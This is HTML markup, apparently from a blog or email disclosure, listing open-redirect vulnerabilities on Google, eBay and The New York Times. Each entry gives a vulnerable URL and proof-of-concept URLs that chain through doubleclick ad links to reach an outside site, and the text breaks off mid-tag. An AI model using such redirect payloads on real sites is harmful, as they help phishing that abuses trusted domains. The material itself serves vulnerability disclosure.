<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URL:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/Logout?service=<wbr></wbr>writely&continue=https://<wbr></wbr>google.com/</a></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fsecurity" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/Logout?service=wise&<wbr></wbr>continue=http%3A%2F%<wbr></wbr>2Fgoogleads.g.doubleclick.net%<wbr></wbr>2Faclk%3Fsa%3DL%26ai%<wbr></wbr>3DCtHoIVxn3UvjLOYGKiAeelIHIBfL<wbr></wbr>QnccEAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoE5AFP0<wbr></wbr>NHr5cHwFmWgKNs6HNTPVk7TWSV-<wbr></wbr>CDHX83dKdGSWJ2ADoZNIxUHZwjAODR<wbr></wbr>yDY_<wbr></wbr>7nVtpuqSLOTef4xzVxDQ2U22MNbGak<wbr></wbr>33Ur7i2jDB8LdYt9TbC3ifsXmklY5j<wbr></wbr>l3Zpq4_lP7wagVfjt0--<wbr></wbr>tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_<wbr></wbr>lPlnyGjlWzF8yn437iaxhGRwYLt_<wbr></wbr>CymifLO2YaJPkCm9nLpONtUM-<wbr></wbr>mstUSpKQrP2VjjaZkbDtuK0naLLBV3<wbr></wbr>7aYEY4TzWQi8fQGN47z4XgpinBCna9<wbr></wbr>1zQayZjn2wxccDCl0zgBAGgBhU%<wbr></wbr>26num%3D0%26sig%3DAOD64_<wbr></wbr>3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%<wbr></wbr>26client%3Dca-pub-<wbr></wbr>0466582109566532%26adurl%<wbr></wbr>3Dhttp%3A%2F%2Fwww.tetraph.<wbr></wbr>com%2Fsecurity</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">More Details:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Video:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=btuSq89khcQ&feature=youtu.be</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Blog:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html" style="background-color: white;" target="_blank">http://computerobsess.<wbr></wbr>blogspot.com/2014/11/google-<wbr></wbr>covert-redirect-vulnerability.<wbr></wbr>html</a></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>(3.2) </b></span><b>eBay Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net</b></span></div>
<div style="margin: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">ebay.com</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"eBay
Inc. (stylized as ebay) is an American multinational corporation and
e-commerce company, providing consumer to consumer & business to
consumer sales services via Internet. It is headquartered in San Jose,
California, United States. eBay was founded by Pierre Omidyar in 1995,
and became a notable success story of the dot-com bubble. Today, it is a
multi-billion dollar business with operations localized in over thirty
countries. The company manages eBay.com, an online auction and shopping
website in which people and businesses buy and sell a broad variety of
goods and services worldwide. In addition to its auction-style sales,
the website has since expanded to include "Buy It Now" shopping;
shopping by UPC, ISBN, or other kind of SKU (via Half.com); online
classified advertisements (via Kijiji or eBay Classifieds); online event
ticket trading (via StubHub); online money transfers (via PayPal) and
other services. It is not a free website, but charges users an invoice
fee when sellers have sold or listed any items." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URL:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/" style="background-color: white;" target="_blank">http://rover.ebay.com/rover/1/<wbr></wbr>711-67261-24966-0/2?mtid=691&<wbr></wbr>kwid=1&crlp=1_263602&itemid=<wbr></wbr>370825182102&mpre=http://<wbr></wbr>googleads.g.doubleclick.net/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L%26ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV%26num=0%26sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ%26client=ca-pub-0466582109566532%26adurl=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://rover.ebay.com/rover/1/<wbr></wbr>711-67261-24966-0/2?mtid=691&<wbr></wbr>kwid=1&crlp=1_263602&itemid=<wbr></wbr>370825182102&mpre=http://<wbr></wbr>googleads.g.doubleclick.net/<wbr></wbr>aclk?sa=L%26ai=C-<wbr></wbr>RHnNvn2Uom8LeTaigfjkIHICfLQncc<wbr></wbr>EAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEhQFP0<wbr></wbr>LHofgVzg8U9Bvwu2_<wbr></wbr>hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6<wbr></wbr>QzMgNxx0_UawPG3-<wbr></wbr>UD097GLLCirbVMl2QxQqa04U3cp4YF<wbr></wbr>gV5dshYbzmqlVVfNn-<wbr></wbr>NuunzLNab6ATE5BUwQ9bgXBOW_<wbr></wbr>qEz8qgbwVOvUJrn1IzL-<wbr></wbr>ymANaKsQLZ9POlkbIe4AQBoAYV%<wbr></wbr>26num=0%26sig=AOD64_3a3m_P_<wbr></wbr>9GRVFc6UIGvnornMcLMoQ%<wbr></wbr>26client=ca-pub-<wbr></wbr>0466582109566532%26adurl=http:<wbr></wbr>//www.tetraph.com/security</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">More Details:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Video:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=a4H-u17Y9ks" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=a4H-u17Y9ks</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Blog:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://tetraph.blogspot.com/2014/11/ebay-covert-redirect-vulnerability.html" style="background-color: white;" target="_blank">http://tetraph.blogspot.com/<wbr></wbr>2014/11/ebay-covert-redirect-<wbr></wbr>vulnerability.html</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>(3.3) </b></span><b>The New York Times (Nytimes.com) Covert Redirect Vulnerability Based on Google Doubleclick.net</b></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">nytimes.com</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"The
New York Times (NYT) is an American daily newspaper, founded and
continuously published in New York City since September 18, 1851, by the
New York Times Company. It has won 114 Pulitzer Prizes, more than any
other news organization. The paper's print version has the largest
circulation of any metropolitan newspaper in the United States, and the
second-largest circulation overall, behind The Wall Street Journal. It
is ranked 39th in the world by circulation. Following industry trends,
its weekday circulation has fallen to fewer than one million daily since
1990. Nicknamed for years as "The Gray Lady", The New York Times is
long regarded within the industry as a national "newspaper of record".
It is owned by The New York Times Company. Arthur Ochs Sulzberger, Jr.,
(whose family (Ochs-Sulzberger) has controlled the paper for five
generations, since 1896), is both the paper's publisher and the
company's chairman. Its international version, formerly the
International Herald Tribune, is now called the International New York
Times." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URL:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ffacebook%2Ecom%2Fall%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion" style="background-color: white;" 